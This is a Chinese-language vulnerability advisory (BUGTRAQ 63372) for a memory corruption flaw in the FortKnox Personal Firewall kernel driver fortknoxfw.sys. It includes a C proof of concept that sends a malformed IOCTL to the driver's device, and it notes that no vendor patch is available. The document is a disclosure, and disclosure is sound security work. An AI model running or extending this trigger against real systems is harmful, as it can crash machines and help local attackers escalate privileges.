发布日期:2013-10-24
更新日期:2013-10-30
受影响系统:
fortknox-firewall fortknox-firewall 9.0.305.0
fortknox-firewall fortknox-firewall 10.0.305.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63372
FortKnox是个人防火墙解决方案。
FortKnox Personal Firewall 9.0.305.0、10.0.305.0的内核驱动程序fortknoxfw.sys存在内存破坏漏洞,本地攻击者可利用此漏洞以提升的权限执行任意代码。
<*来源:Arash Allebrahim
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include<stdio.h>
#include<windows.h>
#include<stdlib.h>
int main(int argc, char *argv[])
{
BOOL res = FALSE;
HANDLE hDevice = INVALID_HANDLE_VALUE;
BYTE obuff[0x98];
ULONG inputBuffer;
DWORD bts;
hDevice = CreateFile("\\\\.\\fortknoxfw_ctl",
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_OVERLAPPED
,NULL);
if(hDevice == INVALID_HANDLE_VALUE){
printf("(-)Failure while File Creation!");
exit(0);
}else{
printf("(+) trying to send the IO Control code to the device ...");
inputBuffer = 0;
memset(obuff,0x41,0x98);
res = DeviceIoControl(hDevice,0x8e86200c,&inputBuffer,0x98,obuff,0x98,&bts,NULL);
if(res==FALSE)
printf("Failed while DeviceIoControl");
}
return 0;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
fortknox-firewall
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: